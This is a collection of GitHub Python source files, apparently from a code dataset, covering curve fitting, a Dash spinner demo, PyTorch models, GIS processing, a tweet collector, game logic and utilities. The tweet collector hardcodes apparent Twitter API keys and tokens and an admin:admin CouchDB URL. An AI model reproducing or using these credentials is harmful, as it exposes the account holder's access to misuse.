sigma])\n return popt\n\n\n# generate simulated data\nnp.random.seed(123) # comment out if you want different data each time\nxdata = np.linspace(3, 10, 100)\nydata_perfect = gauss(xdata, 20, 5, 6, 1)\nydata = np.random.normal(ydata_perfect, 1, 100)\n\nH, A, x0, sigma = gauss_fit(xdata, ydata)\nFWHM = 2.35482 * sigma\n\nprint('The offset of the gaussian baseline is', H)\nprint('The center of the gaussian fit is', x0)\nprint('The sigma of the gaussian fit is', sigma)\nprint('The maximum intensity of the gaussian fit is', H + A)\nprint('The Amplitude of the gaussian fit is', A)\nprint('The FWHM of the gaussian fit is', FWHM)\n\nplt.plot(xdata, ydata, 'ko', label='data')\nplt.plot(xdata, ydata_perfect, '-k', label='data (without_noise)')\nplt.plot(xdata, gauss(xdata, *gauss_fit(xdata, ydata)), '--r', label='fit')\n\nplt.legend()\nplt.title('Gaussian fit, $f(x) = A e^{(-(x-x_0)^2/(2sigma^2))}$')\nplt.xlabel('Motor position')\nplt.ylabel('Intensity (A)')\nplt.show()","repo_name":"isabel-sp/isabelsurop","sub_path":"image_process/gaussian.py","file_name":"gaussian.py","file_ext":"py","file_size_in_byte":1346,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"27757725975","text":"import time\n\nimport dash\nimport dash_bootstrap_components as dbc\nimport dash_loading_spinners as dls\nfrom dash import Input, Output, html\n\napp = dash.Dash(external_stylesheets=[dbc.themes.UNITED])\n\nspinner_options = {\n # Dots\n \"Beat\": dls.Beat,\n \"ThreeDots\": dls.ThreeDots,\n \"Pulse\": dls.Pulse,\n \"Ellipsis\": dls.Ellipsis,\n \"Rotate\": dls.Rotate,\n \"Sync\": dls.Sync,\n \"Propagate\": dls.Propagate,\n \"Rise\": dls.Rise,\n \"Dot\": dls.Dot,\n \"MutatingDots\": dls.MutatingDots,\n # Circles\n \"Tunnel\": dls.Tunnel,\n \"Puff\": dls.Puff,\n \"Target\": dls.Target,\n \"Rings\": dls.Rings,\n \"Ripple\": dls.Ripple,\n # Grid\n \"Grid\": dls.Grid,\n \"GridFade\": dls.GridFade,\n \"Circles\": dls.Circles,\n # Circle\n \"Oval\": dls.Oval,\n \"RevolvingDot\": dls.RevolvingDot,\n \"Moon\": dls.Moon,\n \"TailSpin\": dls.TailSpin,\n \"Clip\": dls.Clip,\n \"DualRing\": dls.DualRing,\n \"RingChase\": dls.RingChase,\n \"Roller\": dls.Roller,\n \"Ring\": dls.Ring,\n \"Bounce\": dls.Bounce,\n \"SpinningDisc\": dls.SpinningDisc,\n \"Hourglass\": dls.Hourglass,\n # Square\n \"Square\": dls.Square,\n # Lines\n \"Audio\": dls.Audio,\n \"Scale\": dls.Scale,\n \"Bars\": dls.Bars,\n \"Wave\": dls.Wave,\n # Triangle\n \"BallTriangle\": dls.BallTriangle,\n \"Triangle\": dls.Triangle,\n \"Skew\": dls.Skew,\n # Special\n \"Hash\": dls.Hash,\n \"Fade\": dls.Fade,\n \"Clock\": dls.Clock,\n \"Pacman\": dls.Pacman,\n \"Hearts\": dls.Hearts,\n \"ClimbingBox\": dls.ClimbingBox,\n}\n\nloading_output = html.Div(id=\"loading-output\", style={\"height\": \"100px\"})\nsvg = \"\"\"\n \n \n \n \n \n \n \n \n\"\"\"\n\n\ndef getSpinnerBox(title, spinner):\n return dbc.Col(\n html.Div(\n [html.Div(title), spinner(fullscreen=False)],\n className=\"d-flex flex-column align-items-center \"\n \"justify-content-center border border-primary rounded h-100\",\n ),\n className=\"col-md-3\",\n style={\"height\": \"150px\"},\n )\n\n\nallSpinners = [\n getSpinnerBox(t, s) for t, s in spinner_options.items() if s is not None\n]\n\n\napp.layout = html.Div(\n [\n html.Div(\"Loading spinners.\", className=\"h1\"),\n html.Div(\n \"Loading spinners can be used whilst a dash component is loading.\",\n className=\"p\",\n ),\n html.Div(\n dls.Hash(\n loading_output,\n id=\"loading-item\",\n fullscreen=False,\n fullscreenClassName=\"bg-light\",\n ),\n id=\"loader\",\n className=\"container d-flex justify-content-center\"\n \" align-items-center border border-primary rounded my-2\",\n ),\n html.Div(\n [\n dbc.Row(\n [\n dbc.Col(\n html.Div(\n [\n dbc.Checkbox(\n checked=False,\n id=\"fullscreen\",\n className=\"me-2\",\n ),\n dbc.Label(\"Fullscreen?\"),\n ]\n ),\n className=\"col-md-4\",\n ),\n dbc.Col(\n html.Div(\n dbc.Button(\n \"View\",\n id=\"loading-button\",\n className=\"btn-success\",\n n_clicks=0,\n )\n ),\n className=\"col-md-2\",\n ),\n ],\n className=\"align-items-end\",\n )\n ],\n className=\"container\",\n ),\n html.Div(\"All loading spinners.\", className=\"h1\"),\n html.Div(\n [\n dbc.Row(\n allSpinners[i : min(i + 4, len(allSpinners))],\n className=\"m-2\",\n )\n for i in range(0, len(allSpinners), 4)\n ]\n ),\n html.Div(\"Custom loading spinners.\", className=\"h1\"),\n html.Div(\n \"If you have animated SVG code, you can use this as a \"\n \"custom spinner.\",\n className=\"p\",\n ),\n html.Div(\n dls.Custom(\n id=\"custom-loader\",\n fullscreen=False,\n fullscreenClassName=\"bg-light\",\n svg=svg,\n ),\n style={\"height\": \"200px\"},\n className=\"container d-flex justify-content-center \"\n \"align-items-center border border-primary rounded my-2\",\n ),\n html.Div(\n dbc.Row(\n [\n dbc.Col(\n dbc.Textarea(\n id=\"svg-text\", value=svg, style={\"height\": \"200px\"}\n ),\n className=\"col-md-9\",\n ),\n dbc.Col(\n dbc.Button(\n \"View\",\n id=\"custom-button\",\n className=\"btn-success\",\n n_clicks=0,\n ),\n className=\"col-md-3\",\n ),\n ],\n className=\"mx-2\",\n ),\n ),\n ],\n)\n\n\n@app.callback(Output(\"custom-loader\", \"svg\"), [Input(\"svg-text\", \"value\")])\ndef change_custom(value):\n return value\n\n\n@app.callback(\n Output(\"loading-item\", \"fullscreen\"), [Input(\"fullscreen\", \"checked\")]\n)\ndef change_fullscreen(checked):\n return checked\n\n\n@app.callback(\n Output(\"loading-output\", \"children\"),\n [Input(\"loading-button\", \"n_clicks\")],\n)\ndef load_output(n):\n\n if n:\n time.sleep(3)\n return f\"Output loaded {n} times\"\n return \"Output not reloaded yet\"\n\n\nif __name__ == \"__main__\":\n app.run_server(debug=True, port=8088)\n","repo_name":"glsdown/dash-loading-spinners","sub_path":"examples/usage.py","file_name":"usage.py","file_ext":"py","file_size_in_byte":6707,"program_lang":"python","lang":"en","doc_type":"code","stars":32,"dataset":"github-code","pt":"3"} +{"seq_id":"5465800810","text":"import torch \nimport torch.nn as nn\nimport numpy as np\nfrom utils import *\n\n\n \nclass bayesian_classifier_chain_clf(nn.Module):\n def __init__(self, INPUT_DIM, HIDDEN_DIM, N_CLASSES, PARENT_DICT, DEVICE='cuda', CELL_TYPE='GRU'):\n super(bayesian_classifier_chain_clf, self).__init__()\n self.NAME = \"bayesian_classifier_chain_clf\"\n self.HIDDEN_DIM = HIDDEN_DIM\n self.INPUT_DIM = INPUT_DIM\n self.N_CLASSES = N_CLASSES\n self.CELL_TYPE = CELL_TYPE\n self.device = DEVICE\n self.N_LAYERS = 1\n self.parent_dict = PARENT_DICT\n\n if CELL_TYPE == \"RNN\":\n self.rnn_cell = nn.RNN(INPUT_DIM+self.N_CLASSES, HIDDEN_DIM, self.N_LAYERS, batch_first=False) \n elif CELL_TYPE == \"GRU\":\n self.rnn_cell = nn.GRU(INPUT_DIM+self.N_CLASSES, HIDDEN_DIM, self.N_LAYERS, batch_first=False) \n elif CELL_TYPE == \"LSTM\":\n self.rnn_cell = nn.LSTM(INPUT_DIM+self.N_CLASSES, HIDDEN_DIM, self.N_LAYERS, batch_first=False) \n\n self.out = nn.Linear(HIDDEN_DIM, self.N_CLASSES) \n\n def initHidden(self, BATCH_SIZE):\n if self.CELL_TYPE == \"LSTM\":\n return (torch.zeros(self.N_LAYERS, BATCH_SIZE, self.HIDDEN_DIM).to(self.device),\n torch.zeros(self.N_LAYERS, BATCH_SIZE, self.HIDDEN_DIM).to(self.device))\n else:\n return torch.zeros(self.N_LAYERS, BATCH_SIZE, self.HIDDEN_DIM).to(self.device)\n\n def forward(self, X, Y=False, TRAINING = True):\n\n\n predictions = []\n\n prev_preds = torch.Tensor(np.zeros(X.shape[1])).to(self.device)\n\n X_aug = torch.cat((prev_preds.unsqueeze(0).unsqueeze(2), X), dim=2)\n\n if TRAINING:\n pred_list = []\n for instance in range(X.shape[1]):\n x = X[:,instance,:].unsqueeze(1)\n #print('Y shape', Y.shape)\n y = Y[instance] #if Y is [b, C]\n #print('y shape', y.shape)\n \n pred_y = torch.Tensor(np.zeros(self.N_CLASSES)).to(self.device)\n for c in range(self.N_CLASSES):\n self.state = self.initHidden(x.shape[1])\n parents = self.parent_dict[c]['parents']\n if len(parents) == 0:\n parent_vec = torch.Tensor(np.zeros(self.N_CLASSES)).to(self.device)\n x_aug = torch.cat((parent_vec.unsqueeze(0).unsqueeze(1), x), dim=2)\n output, self.state = self.rnn_cell(x_aug, self.state)\n pred_y[c] += self.out(output).flatten()[c] \n \n else:\n for p in parents:\n parent_vec = torch.Tensor(np.zeros(self.N_CLASSES)).to(self.device)\n parent_vec[p] = y[p] \n x_aug = torch.cat((parent_vec.unsqueeze(0).unsqueeze(1), x), dim=2)\n output, self.state = self.rnn_cell(x_aug, self.state)\n pred_y[c] += self.out(output).flatten()[c] \n pred_y = pred_y.view(1,-1) \n pred_list.append(pred_y)\n y_pred = torch.cat(pred_list)\n return y_pred\n else:\n predicted_dict = {}\n code = 0\n for instance in range(X.shape[1]):\n x = X[:,instance,:].unsqueeze(1)\n x_k = 'x' + str(code)\n predicted_dict[x_k] = {}\n for c in range(self.N_CLASSES):\n self.infer(x, x_k, c, predicted_dict)\n code += 1\n return predicted_dict\n \n def infer(self, x, x_k, c, predicted_dict):\n parents = self.parent_dict[c]['parents']\n state = self.initHidden(x.shape[1])\n if c not in predicted_dict[x_k].keys():\n if len(parents) == 0:\n parent_vec = torch.Tensor(np.zeros(self.N_CLASSES)).to(self.device)\n x_aug = torch.cat((parent_vec.unsqueeze(0).unsqueeze(1), x), dim=2)\n output, state = self.rnn_cell(x_aug, state)\n predicted_dict[x_k][c] = torch.sigmoid(self.out(output).flatten()[c])\n else:\n for p in parents:\n if p not in predicted_dict[x_k].keys():\n self.infer(x,x_k,p,predicted_dict)\n state = self.initHidden(x.shape[1])\n for p in parents:\n parent_vec = torch.Tensor(np.zeros(self.N_CLASSES)).to(self.device)\n parent_vec[p] = torch.round(predicted_dict[x_k][p])\n x_aug = torch.cat((parent_vec.unsqueeze(0).unsqueeze(1), x), dim=2)\n output, state = self.rnn_cell(x_aug, state)\n predicted_dict[x_k][c] = torch.sigmoid(self.out(output).flatten()[c]) #if out is [c]\n\n \n def computeLoss(self, logits, labels):\n criterion = nn.BCEWithLogitsLoss()\n loss = criterion(logits, labels)\n return loss","repo_name":"waltergerych/RBCC","sub_path":"models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":4992,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"3"} +{"seq_id":"16566064362","text":"#!/usr/bin/python\n\nimport glob,os\nimport grass.script as grass\n\n\n# Insert Path to input maps folder\nlyrs_in = \"/home/user/test/mygeoss_points/\"\n \n# Insert Path to folder for output map storing\nlyrs_out = \"/home/user/test/mygeoss_points/\"\n \n \n# Processing\nos.chdir(lyrs_in)\nlayers=[]\nfor file in glob.glob(\"*.shp\"):\n layers.append(file)\n\n\nfor item in layers:\n grass.run_command(\"v.in.ogr\",input=item,output=item.split(\".\")[0],quiet=True)\n chk = grass.read_command(\"v.info\",map=item.split(\".\")[0],flags=\"t\")\n if (chk.split(\"\\n\")[1]).split(\"=\")[1] > 0:\n grass.run_command(\"v.kernel\",input=item.split(\".\")[0],output=item.split(\".\")[0],radius=1200,kernel=\"quartic\",overwrite=True, quiet=True)\n max = (grass.read_command(\"r.univar\", map=item.split(\".\")[0], flags=\"g\").split(\"\\n\"))[4].split(\"=\")[1]\n grass.mapcalc(\"$out = $inp/$max\", out=\"N\"+item.split(\".\")[0], inp=item.split(\".\")[0], max=max)\n grass.run_command(\"r.out.gdal\", input=\"N\"+item.split(\".\")[0], output=lyrs_out+\"N\"+item.split(\".\")[0]+\".tiff\", quiet=True)\n","repo_name":"GabrielePrestifilippo/CityFocus","sub_path":"Data processing/point_process.py","file_name":"point_process.py","file_ext":"py","file_size_in_byte":1060,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"3"} +{"seq_id":"5261667474","text":"\r\nimport couchdb\r\nfrom tweepy import Stream\r\nfrom tweepy import OAuthHandler\r\nfrom tweepy.streaming import StreamListener\r\nimport json\r\n\r\n\r\n###API ########################\r\nckey = \"Ok7GRYYssNsfY9lXR8CIe3xeJ\"\r\ncsecret = \"5YrZnShw3g93HAVyASSlyrAER8ok0Sae1gU3mZXBTBxCXyDpUD\"\r\natoken = \"1288264585519288320-uSIAbWH8d7zossuXMpN87FmMeZeUS4\"\r\nasecret = \"804vnKpAWdmdl150dEb7IknuPbKsjkGx7wiBqb3LJ2XqY\"\r\n#####################################\r\n\r\nclass listener(StreamListener):\r\n \r\n def on_data(self, data):\r\n dictTweet = json.loads(data)\r\n try:\r\n \r\n dictTweet[\"_id\"] = str(dictTweet['id'])\r\n doc = db.save(dictTweet)\r\n print (\"SAVED\" + str(doc) +\"=>\" + str(data))\r\n except:\r\n print (\"Already exists\")\r\n pass\r\n return True\r\n \r\n def on_error(self, status):\r\n print (status)\r\n \r\nauth = OAuthHandler(ckey, csecret)\r\nauth.set_access_token(atoken, asecret)\r\ntwitterStream = Stream(auth, listener())\r\n\r\n'''========couchdb'=========='''\r\nserver = couchdb.Server('http://admin:admin@localhost:5984/') #('http://115.146.93.184:5984/')\r\ntry:\r\n db = server.create('tweets_ecuador')\r\nexcept:\r\n db = server['tweets_ecuador']\r\n \r\n\r\n#twitterStream.filter(track=['Guillermo Lasso','Fabricio Correa','Gustavo Larrea', 'Lucio Gutiérrez', 'Lucio Gutierrez', 'Andrés Aráuz', 'Andres Arauz', 'Guillermo Celi', 'Yaku Pérez', 'Yaku Perez', 'César Montúfar', 'Cesar Montufar', 'Isidro Romero', 'Gerson Almeida', 'Ximena Peña', 'Paúl Carrasco', 'Paul Carrasco', 'Esteban Quirola', 'Miguel Salem Kronfle', 'Cristina Reyes', 'Xavier Hervas', 'José Freile', 'Juan Fernando Velasco', 'Washington Pesántez', 'Elecciones Ecuador','Creo', 'Justicia Social','Democracia Si', 'Partido Sociedad Patriótica','Centro Democrático','Unión por la esperanza','Union por la esperanza','SUMA','suma','Pachakutik','Concertación','avanza','Ecuatoriano Unido','Alianza país','Juntos podemos','Libertad es pueblo','Fuerza Ecuador','Social Cristiano','Izquierda Democratica','Izquierda Democrática','Construye','Unión Ecuatoriana','Union Ecuatoriana','Elecciones2020'])\r\n\r\n'''===============LOCATIONS==============''' \r\n#Manta\r\ntwitterStream.filter(locations=[-92.21,-5.02,-75.19,1.95]) \r\n","repo_name":"Cristiangpbf/Proyecto_Final_BDDM","sub_path":"Scripts de recolección de datos/tweets_ecuador.py","file_name":"tweets_ecuador.py","file_ext":"py","file_size_in_byte":2281,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"36053112925","text":"import sys\ninput = sys.stdin.readline\n\ndef back(idx):\n global ans\n if len(stack) == 11:\n ans = max(ans, sum(stack))\n return\n\n for i in range(11):\n if scores[idx][i] != 0 and not visited[i]:\n visited[i] = 1\n stack.append(scores[idx][i])\n back(idx+1)\n stack.pop()\n visited[i] = 0\n\nT = int(input())\nfor _ in range(T):\n scores = [list(map(int, input().split())) for _ in range(11)]\n ans = 0\n stack = []\n visited = [0] * 11\n back(0)\n print(ans)\n","repo_name":"Sangmin627/AlgoStudy2023","sub_path":"상진/Baekjoon/Backtracking/BOJ3980.py","file_name":"BOJ3980.py","file_ext":"py","file_size_in_byte":543,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"3"} +{"seq_id":"37421513404","text":"# config.py\n# Simple config class used for initializing a QuartzNet model.\n# Note:\n# There are 4 Convolutional sections C, 5 Blocks B, each block B\n# with 5 Time Separable 1D Convolutional sections S. The blocks B are\n# repeated R times.\n# Model name = (B x R) X S\n# B = 5, R = {1, 2, 3} (aka block_repeat), S = 5 (module_repeat)\n# Tensorflow 2.4\n# Python 3.7\n# Windows/MacOS/Linux\n\n\nimport os\nimport json\n\n\nclass Config:\n\tdef __init__(self, block_repeat=3, module_repeat=5):\n\t\t# Model | block_repeat | module_repeat\n\t\t# 5x5 1 5\n\t\t# 10x5 2 5\n\t\t# 15x5 3 5\n\t\tself.block_repeat = block_repeat\n\t\tself.module_repeat = module_repeat\n\n\n\tdef save_config(self, path_dir):\n\t\tif not os.path.exists(path_dir):\n\t\t\tos.makedirs(path_dir, exist_ok=True)\n\t\twith open(os.path.join(path_dir, \"config.json\"), \"w+\") as f:\n\t\t\tdata = {\n\t\t\t\t\"block_repeat\": self.block_repeat,\n\t\t\t\t\"module_repeat\": self.module_repeat,\n\t\t\t}\n\t\t\tjson.dump(data, f, indent=4)\n\n\n\tdef load_config(self, path_dir):\n\t\tconfig_file = os.path.join(path_dir, \"config.json\")\n\t\tif not os.path.exists(path_dir):\n\t\t\tprint(f\"Error: Could not locate path: {path_dir}\")\n\t\telif not os.path.exists(config_file):\n\t\t\tprint(f\"Error: Could not locate config file: {config_file}\")\n\t\twith open(os.path.join(path_dir, \"config.json\"), \"w+\") as f:\n\t\t\tdata = json.load(f)\n\t\tself.block_repeat = data[\"block_repeat\"]\n\t\tself.module_repeat = data[\"module_repeat\"]","repo_name":"dmmagdal/QuartzNet_ASR","sub_path":"config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":1453,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"3"} +{"seq_id":"71231946643","text":"import torch\n\n\n# The following code is borrowed from Ross Wightman implementation at\n# https://github.com/mlfoundations/open_clip/blob/a5ba05f7cab5ddab7c9967bfb8bbef303be6f3aa/src/open_clip/loss.py\n\n# The code is borrowed for the purpose of testing the correctness of the Sigmoid Loss\n\n\ndef neighbour_exchange(from_rank, to_rank, tensor, group=None):\n tensor_recv = torch.zeros_like(tensor)\n send_op = torch.distributed.P2POp(\n torch.distributed.isend,\n tensor,\n to_rank,\n group=group,\n )\n recv_op = torch.distributed.P2POp(\n torch.distributed.irecv,\n tensor_recv,\n from_rank,\n group=group,\n )\n reqs = torch.distributed.batch_isend_irecv([send_op, recv_op])\n for req in reqs:\n req.wait()\n return tensor_recv\n\n\ndef neighbour_exchange_bidir(left_rank, right_rank, tensor_to_left, tensor_to_right, group=None):\n tensor_from_left = torch.zeros_like(tensor_to_right)\n tensor_from_right = torch.zeros_like(tensor_to_left)\n send_op_left = torch.distributed.P2POp(\n torch.distributed.isend,\n tensor_to_left,\n left_rank,\n group=group,\n )\n send_op_right = torch.distributed.P2POp(\n torch.distributed.isend,\n tensor_to_right,\n right_rank,\n group=group,\n )\n recv_op_left = torch.distributed.P2POp(\n torch.distributed.irecv,\n tensor_from_left,\n left_rank,\n group=group,\n )\n recv_op_right = torch.distributed.P2POp(\n torch.distributed.irecv,\n tensor_from_right,\n right_rank,\n group=group,\n )\n reqs = torch.distributed.batch_isend_irecv(\n [send_op_right, send_op_left, recv_op_right, recv_op_left]\n )\n for req in reqs:\n req.wait()\n return tensor_from_right, tensor_from_left\n\n\nclass NeighbourExchange(torch.autograd.Function):\n @staticmethod\n def forward(ctx, from_rank, to_rank, group, tensor):\n ctx.group = group\n ctx.from_rank = from_rank\n ctx.to_rank = to_rank\n return neighbour_exchange(from_rank, to_rank, tensor, group=group)\n\n @staticmethod\n def backward(ctx, grad_output):\n return (None, None, None) + (\n NeighbourExchange.apply(ctx.to_rank, ctx.from_rank, ctx.group, grad_output),\n )\n\n\ndef neighbour_exchange_with_grad(from_rank, to_rank, tensor, group=None):\n return NeighbourExchange.apply(from_rank, to_rank, group, tensor)\n\n\nclass NeighbourExchangeBidir(torch.autograd.Function):\n @staticmethod\n def forward(ctx, left_rank, right_rank, group, tensor_to_left, tensor_to_right):\n ctx.group = group\n ctx.left_rank = left_rank\n ctx.right_rank = right_rank\n return neighbour_exchange_bidir(\n left_rank, right_rank, tensor_to_left, tensor_to_right, group=group\n )\n\n @staticmethod\n def backward(ctx, *grad_outputs):\n return (None, None, None) + NeighbourExchangeBidir.apply(\n ctx.right_rank, ctx.left_rank, ctx.group, *grad_outputs\n )\n\n\ndef neighbour_exchange_bidir_with_grad(\n left_rank, right_rank, tensor_to_left, tensor_to_right, group=None\n):\n return NeighbourExchangeBidir.apply(\n left_rank, right_rank, group, tensor_to_left, tensor_to_right\n )\n","repo_name":"ahmdtaha/distributed_sigmoid_loss","sub_path":"distributed_utils.py","file_name":"distributed_utils.py","file_ext":"py","file_size_in_byte":3266,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"3"} +{"seq_id":"29073353868","text":"number = 98\nguess = input(\"你猜是什么数:\")\nguess = int(guess)\n\nif guess == number:\n print(\"你猜中了!厉害!\")\nelse:\n print(\"你没有猜中。\")\n\n\n#扩展功能:\n# 若玩家没有猜中,给出“你猜的数大了”或“你猜的数小了”的输出。","repo_name":"yeahatgithub/LightComputerGames","sub_path":"guess_number/guess_once.py","file_name":"guess_once.py","file_ext":"py","file_size_in_byte":282,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"7891685925","text":"import decimal\nimport logging\nimport logging.config\nimport uuid\nfrom datetime import date, datetime\nfrom typing import Any\n\nfrom pythonjsonlogger import jsonlogger\nimport simplejson\n\nfrom .types import Config\n\n__all__ = [\"configure_logging\", \"logger\"]\nlogger = logging.getLogger(\"chaosiqagent\")\n\n\ndef encoder(o: Any) -> str: # pragma: no cover\n \"\"\"\n Perform some additional encoding for types JSON doesn't support natively.\n We don't try to respect any ECMA specification here as we want to retain\n as much information as we can.\n \"\"\"\n if isinstance(o, (date, datetime)):\n # we do not meddle with the timezone and assume the date was stored\n # with the right information of timezone as +-HH:MM\n return o.isoformat()\n elif isinstance(o, decimal.Decimal):\n return str(o)\n elif isinstance(o, uuid.UUID):\n return str(o)\n\n raise TypeError(\n \"Object of type '{}' is not JSON serializable\".format(type(o)))\n\n\ndef configure_logging(config: Config) -> None:\n \"\"\"\n Configure the application's logger.\n\n Look into the configuration for two options:\n\n * DEBUG: to enable `\"DEBUG\"` level, `\"INFO\"` otherwise\n * LOG_FORMAT: to define which format should be used to log `\"plain\"` or\n `\"structured\"` for json logging\n \"\"\"\n verbose = config.debug\n log_format = config.log_format\n level = logging.DEBUG if verbose else logging.INFO\n\n struct_fmt = \"%(process) %(asctime) %(levelname) %(module) %(lineno) \" \\\n \"%(message) %(trace)\"\n cfg = {\n \"version\": 1,\n \"disable_existing_loggers\": False,\n \"formatters\": {\n \"plain\": {\n 'format': '%(asctime)s %(levelname)s %(name)s %(message)s'\n },\n \"structured\": {\n \"()\": jsonlogger.JsonFormatter,\n \"fmt\": struct_fmt,\n \"json_default\": encoder,\n \"json_serializer\": simplejson.dumps,\n \"json_indent\": None,\n \"timestamp\": True\n }\n },\n \"handlers\": {\n \"default\": {\n \"level\": level,\n \"class\": \"logging.StreamHandler\",\n \"formatter\": log_format,\n }\n },\n \"loggers\": {\n \"chaosiqagent\": {\n \"handlers\": [\"default\"],\n \"level\": level,\n \"propagate\": False\n }\n }\n }\n\n logging.config.dictConfig(cfg)\n","repo_name":"chaosiq/chaosiq-agent","sub_path":"chaosiqagent/log.py","file_name":"log.py","file_ext":"py","file_size_in_byte":2468,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"40421807591","text":"import networkx as nx \nimport logging\nimport os\nimport json\nimport random\nfrom components import DATA_DIR\nlogger = logging.getLogger('board')\nlogger.setLevel(logging.INFO)\nfh = logging.FileHandler('output.log')\nformatter = logging.Formatter('%(asctime)s - %(name)s - %(message)s')\nfh.setFormatter(formatter)\nlogger.addHandler(fh)\n\nEDGELIST = os.path.join(DATA_DIR, \"map.edgelist\")\nCITYCOLORS = os.path.join(DATA_DIR, \"city_colors.json\")\nclass Board:\n\n\tdef __init__(self, settings, phase=1):\n\t\t'''\n\t\tedgelist: path to file where map is stored\n\t\tphase: current phase of the game; should always be 1\n\t\t'''\n\t\tself.board = nx.read_weighted_edgelist(EDGELIST)\n\t\tinvalid_cities = self._random_choose_play_area(settings['num_players'])\n\t\tself._strip_cities(invalid_cities)\n\t\tself._initialize_costs()\n\t\tself.phase = phase\n\n\tdef _initialize_costs(self):\n\t\tfor city in self.board.nodes():\n\t\t\tself.board.node[city][\"cost\"] = 10\n\t\t\tself.board.node[city][\"slots\"] = []\n\n\tdef _strip_cities(self, invalid_cities):\n\t\tfor city in invalid_cities:\n\t\t\tself.board.remove_node(city)\n\n\tdef _random_choose_play_area(self, num_players):\n\t\t'''\n\t\tbased on the number of players registered, we chose a \n\t\tsubset of cities to play with. The regions must be contiguous! \n\t\tReturns list of cities that we later remove from the board.\n\t\t'''\n\t\tnum_areas = [0, 0, 0, 3, 4, 5, 5][num_players]\n\t\tif num_areas == 5:\n\t\t\t# if we need to pick 5, we can also just remove a random 1\n\t\t\tcolors = ['brown', 'red', 'purple', 'blue', 'yellow', 'green']\n\t\t\tvalid_colors = colors.remove(random.choice(colors))\n\t\telse:\n\t\t\teur_connections = [('brown', 'red'), ('brown', 'purple'), ('brown', 'yellow'), ('brown', 'green'), ('brown', 'orange'), ('purple', 'red'), ('red', 'yellow'), ('yellow', 'blue'), ('yellow', 'green'), ('blue', 'green'), ('orange', 'green')]\n\t\t\tvalid_colors = list(random.choice(eur_connections))\n\t\t\twhile len(valid_colors) < num_areas:\n\t\t\t\t# get connections with exactly 1 already chosen color\n\t\t\t\tcandidates = [link for link in eur_connections if (bool(link[0] in valid_colors) ^ bool(link[1] in valid_colors))]\n\t\t\t\tlink = random.choice(candidates)\n\t\t\t\tif link[0] in valid_colors:\n\t\t\t\t\tvalid_colors.append(link[1])\n\t\t\t\telse:\n\t\t\t\t\tvalid_colors.append(link[0])\n\t\twith open(CITYCOLORS, 'r') as colorfile:\n\t\t\tcity_colors = json.load(colorfile)\n\t\tinvalid_cities = []\n\t\tfor color in city_colors:\n\t\t\tif color not in valid_colors:\n\t\t\t\tinvalid_cities += city_colors[color]\n\t\treturn invalid_cities\n\n\tdef cities_owned_by_player(self, player_id):\n\t\t'''\n\t\treturns a list of cities owned by the player\n\t\t'''\n\t\tcities = [city for city in self.board.nodes() if player_id in self.board.node[city][\"slots\"]]\n\t\treturn cities\n\n\tdef num_cities(self, player_id):\n\t\t'''\n\t\treturns the number of cities owned by a player\n\t\t'''\n\t\tcities = self.cities_owned_by_player(player_id)\n\t\treturn len(cities)\n\n\tdef update_cost(self, city):\n\t\tpurchased = self.board.node[city]\n\t\tif purchased[\"cost\"] == 10:\n\t\t\tpurchased[\"cost\"] = 15 \n\t\telif purchased[\"cost\"] == 15:\n\t\t\tpurchased[\"cost\"] = 20\n\t\telif purchased[\"cost\"] == 20:\n\t\t\tpurchased[\"cost\"] = -1 \n\n\tdef player_purchase(self, player_id, path):\n\t\t'''\n\t\tallows the player to purchase a slot in the city designated\n\t\t'''\n\t\tcity_name = path[-1]\n\t\tpurchased = self.board.node[city_name]\n\t\tpath_cost = self.cost_of_path(path)\n\t\tcity_cost = self.cost_of_city(city_name)\n\t\tpurchased[\"slots\"].append(player_id)\n\t\tself.update_cost(city_name)\n\t\treturn path_cost + city_cost\n\n\tdef player_in_city(self, player_id, city):\n\t\t'''\n\t\tReturns True if player_id has a generator in city\n\t\t'''\n\t\tif city not in self.board.nodes():\n\t\t\treturn False, \"{} not a valid city name\".format(city)\n\t\tslots = self.board.node[city][\"slots\"]\n\t\tif player_id in slots:\n\t\t\treturn True, \"{} in {}\".format(player_id, city)\n\t\telse:\n\t\t\treturn False, \"{} not in {}\".format(player_id, city)\n\n\tdef can_build(self, player_id, city):\n\t\t'''\n\t\tDetermines if player_id can build in city\n\t\t'''\n\t\tif city not in self.board.nodes():\n\t\t\treturn False, \"{} not valid city name\".format(city)\n\t\tslots = self.board.node[city][\"slots\"]\n\t\tif len(slots) >= self.phase:\n\t\t\treturn False, \"{} already has {} generators built\".format(city, len(slots))\n\t\tif player_id in slots:\n\t\t\treturn False, \"{} has already built in {}\".format(player_id, city) \n\t\treturn True, \"{} can build in {}\".format(player_id, city)\n\n\tdef cost_of_city(self, city):\n\t\tif city not in self.board.nodes():\n\t\t\tlogger.info(\"{} not valid city name\".format(city))\n\t\t\treturn -1 \n\t\treturn self.board.node[city][\"cost\"]\n\n\tdef cost_of_path(self, path):\n\t\t'''\n\t\tgiven a list of city names returns the cost to travel\n\t\tif the path is invalid, returns -1\n\t\t'''\n\t\ttotal_cost = 0\n\t\tfor step in range(len(path) - 1):\n\t\t\tif path[step] not in self.board.nodes():\n\t\t\t\tlogger.info(\"{} not valid city\".format(path[step]))\n\t\t\t\treturn -1\n\t\t\tif path[step+1] in self.board.neighbors(path[step]):\n\t\t\t\t# add cost\n\t\t\t\tcost = self.board[path[step]][path[step+1]]['weight']\n\t\t\t\ttotal_cost += cost\n\t\t\telse:\n\t\t\t\tlogger.info(\"{} and {} are not connected!\".format(path[step], path[step+1]))\n\t\t\t\treturn -1\n\t\treturn total_cost\n","repo_name":"kendlera/pg-server","sub_path":"components/board.py","file_name":"board.py","file_ext":"py","file_size_in_byte":5088,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} 